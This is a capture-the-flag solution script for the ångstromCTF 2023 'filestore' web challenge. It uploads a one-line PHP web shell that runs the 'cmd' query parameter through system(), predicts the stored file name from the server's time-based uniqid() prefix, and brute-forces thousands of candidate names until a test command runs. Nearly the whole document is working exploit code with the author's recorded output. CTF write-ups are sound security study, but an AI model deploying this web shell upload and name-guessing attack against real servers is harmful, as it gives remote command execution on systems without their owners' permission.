Created
April 27, 2023 16:12
ångstromCTF 2023 - web/filestore
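# ångstromCTF 2023 - web/filestore
# Solution: brute-force the uniqid() prefix of the stored upload name.
# uniqid() is a hex timestamp rather than a random token, so once the rest of
# the name is known the prefix narrows to a small window around the upload time.
# Server-side, the guess disappears when stored names come from random_bytes()
# and uploaded files are never evaluated as PHP.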
| import httpx | |
| import subprocess | |
| from concurrent.futures import ThreadPoolExecutor | |
# Target of every request in this script. The commented-out line switches the
# same script to an instance listening on localhost port 3000.
# BASE_URL = "http://localhost:3000"
BASE_URL = "https://filestore.web.actf.co"
def f(_):
    """Upload one probe file, then sample the local clock as a uniqid() value.

    The argument is ignored; it only exists so the function can be driven by
    ``executor.map``. The POST sends a multipart field ``f`` whose filename is
    ``x.php`` and whose declared content type is ``text/plain``.

    Returns the raw stdout of a local ``php -r "echo uniqid();"`` run that is
    started right after the upload call returns.

    NOTE(review): the later search assumes the server prefixes the stored name
    with its own uniqid(); that is not visible here, so confirm it against the
    challenge source. Because uniqid() is time-based, a locally generated value
    lands close to the server's one.
    """
    probe = ("x.php", b'<?php system($_GET["cmd"]);?>', "text/plain")
    httpx.post(BASE_URL, files={"f": probe})

    # The command line is a fixed string; nothing external is interpolated
    # into the shell invocation.
    completed = subprocess.run(
        'php -r "echo uniqid();"',
        shell=True,
        capture_output=True,
        text=True,
    )
    return completed.stdout
# Fixed tail of the stored file name: everything after the time-based prefix.
# NOTE(review): the 64 hex digits look like a digest of a value the uploader
# already knows, followed by the original upload name; confirm against the
# challenge source.
suffix = "_dd5870e129504ca891290dfc0ee4ec63fce43df1bba8d7224642da007c043c98_x.php"

# 64 uploads spread over 16 worker threads; each one returns a local uniqid()
# string sampled just after its upload finished.
with ThreadPoolExecutor(max_workers=16) as pool:
    local_ids = sorted(pool.map(f, range(64)))

# The smallest sample becomes the starting point of the downward search in g().
start = int(local_ids[0], 16)
first_candidate = hex(start)[2:] + suffix
print(first_candidate)
def g(i):
    """Request the candidate name that lies ``i`` ticks before ``start``.

    The candidate is the hex form of ``start - i`` followed by ``suffix``. It
    is sent as the ``f`` query parameter together with ``cmd=echo ok``; the
    candidate counts as found when the response body contains ``ok``.

    Seen from the server, this is a long run of GET requests whose ``f`` value
    differs only in the leading hex counter, which is a usable signal for
    request logging and rate limiting.
    """
    # Progress marker every 200 candidates.
    if i % 200 == 0:
        print(i)

    file = f"{hex(start - i)[2:]}{suffix}"
    query = {"f": file, "cmd": "echo ok"}
    response = httpx.get(BASE_URL, params=query)

    if "ok" not in response.text:
        return

    # The trailing comments record the output of the author's own run.
    print(f"{i = }")  # i = 4211
    print(f"{file = }")  # file = '644415d72a288_dd5870e129504ca891290dfc0ee4ec63fce43df1bba8d7224642da007c043c98_x.php'
# Walk 16**4 consecutive offsets below `start` with 16 worker threads.
# NOTE: the iterator returned by map() is never consumed, so an exception
# raised inside g() is not surfaced here.
offsets = range(16**4)
with ThreadPoolExecutor(max_workers=16) as pool:
    pool.map(g, offsets)